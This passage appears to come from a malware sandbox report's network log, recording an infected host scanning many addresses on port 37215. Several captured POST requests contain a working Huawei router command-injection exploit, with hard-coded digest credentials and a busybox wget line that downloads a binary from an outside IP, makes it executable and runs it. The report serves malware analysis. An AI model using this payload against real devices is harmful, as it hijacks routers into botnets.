                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2508192.168.2.155428641.219.82.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.553806067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2509192.168.2.1544690197.189.0.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.553822994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2510192.168.2.1542748138.115.160.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2511192.168.2.153749641.182.209.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2512192.168.2.154992837.255.240.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2513192.168.2.1558828102.54.222.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2514192.168.2.155918637.179.221.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2515192.168.2.1533800157.132.71.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2516192.168.2.1536478138.139.170.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2517192.168.2.154773845.14.198.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2518192.168.2.1555334121.17.190.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2519192.168.2.1541124190.204.65.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2520192.168.2.1534734157.113.213.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2521192.168.2.1551668186.194.22.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2522192.168.2.153912845.5.241.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2523192.168.2.1533432102.84.224.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2524192.168.2.1560730121.24.36.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2525192.168.2.155762241.26.246.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2526192.168.2.1537932197.156.51.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2527192.168.2.154552494.156.183.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2528192.168.2.1547966102.192.66.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2529192.168.2.153366445.229.56.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2530192.168.2.153570631.228.162.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2531192.168.2.155462094.7.156.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2532192.168.2.1545128197.234.227.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2533192.168.2.1550550186.25.91.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2534192.168.2.1541416186.180.137.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2535192.168.2.1557586102.220.93.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2536192.168.2.155920445.198.126.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2537192.168.2.1541450190.203.97.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2538192.168.2.154266645.151.104.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2539192.168.2.155593037.233.87.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2540192.168.2.1541238156.14.236.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2541192.168.2.1554122181.118.235.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2542192.168.2.1553800102.184.11.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2543192.168.2.1545114190.243.236.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2544192.168.2.1538384186.107.127.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2545192.168.2.1538990157.154.38.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2546192.168.2.156002245.77.201.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2547192.168.2.1543604102.182.36.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2548192.168.2.155340045.35.161.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2549192.168.2.153571294.104.74.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2550192.168.2.1547376122.208.235.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2551192.168.2.1545154186.48.76.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2552192.168.2.1548252186.231.104.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2553192.168.2.1536242122.163.109.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2554192.168.2.154996241.255.57.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2555192.168.2.1535580197.78.144.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2556192.168.2.154441034.69.202.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2557192.168.2.154979894.87.144.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2558192.168.2.154933037.114.166.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2559192.168.2.155680294.128.30.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2560192.168.2.1551066181.108.153.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2561192.168.2.1558742156.235.238.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2562192.168.2.1539094186.82.208.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2563192.168.2.156079431.83.160.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2564192.168.2.1537920190.7.69.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2565192.168.2.1537490122.255.123.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2566192.168.2.153982445.191.174.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2567192.168.2.154450445.44.229.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2568192.168.2.1542522181.182.167.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2569192.168.2.1544118138.179.218.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2570192.168.2.154542094.128.211.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2571192.168.2.1558378222.151.120.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2572192.168.2.1536014157.244.20.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2573192.168.2.155264294.101.96.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2574192.168.2.1533038197.122.80.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2575192.168.2.1538434138.255.109.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2576192.168.2.1539880102.246.223.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2577192.168.2.1535396219.14.87.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2578192.168.2.1559078121.44.19.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2579192.168.2.1550574122.160.22.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2580192.168.2.155241231.87.247.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2581192.168.2.153938445.120.174.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2582192.168.2.1558756222.131.93.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2583192.168.2.1537936102.9.15.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2584192.168.2.1548654121.20.4.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2585192.168.2.1535994121.245.46.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2586192.168.2.154590620.76.127.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2587192.168.2.1548472197.214.52.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2588192.168.2.155616041.82.59.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2589192.168.2.1544446190.49.195.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2590192.168.2.1555152138.209.97.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2591192.168.2.1540056156.100.239.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2592192.168.2.1555672114.62.94.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2593192.168.2.1534024157.50.126.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2594192.168.2.1554800156.66.116.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2595192.168.2.1540960102.5.237.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2596192.168.2.155762237.96.128.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2597192.168.2.153638694.93.0.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2598192.168.2.1534944138.195.133.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2599192.168.2.1534996157.54.243.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2600192.168.2.155599241.170.197.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2601192.168.2.154730631.210.55.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2602192.168.2.1538868222.30.97.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2603192.168.2.1560422190.65.198.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2604192.168.2.154893894.8.220.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2605192.168.2.154303231.235.212.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2606192.168.2.1535504121.191.0.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2607192.168.2.1537672222.94.131.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2608192.168.2.154989237.246.33.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2609192.168.2.1560420186.157.129.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2610192.168.2.1547794186.53.85.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2611192.168.2.1558404157.158.215.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2612192.168.2.1555550181.53.77.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2613192.168.2.1546664102.127.141.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2614192.168.2.1543218118.33.43.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2615192.168.2.1532820156.83.193.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2616192.168.2.1557982117.209.220.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2617192.168.2.155556045.75.143.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2618192.168.2.154600637.98.225.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2619192.168.2.1548990190.125.8.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2620192.168.2.1545808157.130.92.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2621192.168.2.1544930190.184.21.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2622192.168.2.154211241.165.146.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2623192.168.2.1541652118.157.192.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2624192.168.2.154911027.162.41.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2625192.168.2.1553814222.125.98.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2626192.168.2.1550970138.12.169.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2627192.168.2.1545058122.245.171.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2628192.168.2.1538984157.222.203.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2629192.168.2.1547670121.164.30.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2630192.168.2.1536610197.106.198.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2631192.168.2.1550322122.220.210.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2632192.168.2.1556262121.218.53.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2633192.168.2.1543102138.42.155.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2634192.168.2.1550704186.176.27.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2635192.168.2.154367041.95.173.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2636192.168.2.154129031.241.11.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2637192.168.2.1534380156.230.30.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2638192.168.2.1538328222.192.185.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2639192.168.2.1553446190.144.255.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2640192.168.2.1550808222.233.62.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2641192.168.2.1558358121.151.167.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2642192.168.2.154289441.222.5.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2643192.168.2.1557090157.146.246.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2644192.168.2.1544894222.229.38.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2645192.168.2.1553678222.161.88.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2646192.168.2.154277041.86.145.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2647192.168.2.1537400121.215.121.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2648192.168.2.1546962122.230.252.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2649192.168.2.1551018156.132.80.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2650192.168.2.1540402186.31.223.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2651192.168.2.154876841.206.24.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2652192.168.2.1558146102.68.250.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2653192.168.2.1541440186.153.161.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2654192.168.2.1557746122.230.190.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2655192.168.2.1550810122.60.233.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2656192.168.2.1538116122.81.212.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2657192.168.2.155237837.131.247.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2658192.168.2.1556278197.252.86.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2659192.168.2.1558920138.161.175.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2660192.168.2.154624245.114.16.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2661192.168.2.155703845.221.43.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2662192.168.2.15383348.26.131.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2663192.168.2.153501037.121.59.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2664192.168.2.1538770121.133.220.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2665192.168.2.1539222138.149.56.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2666192.168.2.1534456122.38.17.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2667192.168.2.1542838190.155.14.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2668192.168.2.1537220186.138.168.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2669192.168.2.1549836102.236.55.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2670192.168.2.153905494.160.167.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
